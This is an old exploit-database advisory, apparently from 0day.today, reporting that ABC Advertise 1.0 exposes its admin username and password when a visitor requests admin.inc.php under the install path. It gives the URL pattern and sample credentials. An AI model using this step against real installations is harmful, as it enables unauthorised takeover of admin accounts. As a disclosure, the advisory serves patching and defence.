id: 5112
date: 04/26/2009
title: ABC Advertise 1.0 Admin Password Disclosure Vulnerability
author: SirGod
cves: 

=========================================================
ABC Advertise 1.0 Admin Password Disclosure Vulnerability
=========================================================


 
##############################################################
[+] ABC Advertise 1.0 Admin Data Disclosure
[+] Discovered By SirGod
##############################################################
[+] Admin Data Disclosure
 
   - Go to
 
    http://127.0.0.1/[path]/admin.inc.php
 
   - You will find there the admin username and password.
 
   Example : login=admin pass=admin
 
##############################################################




#  0day.today [2023-03-23]  #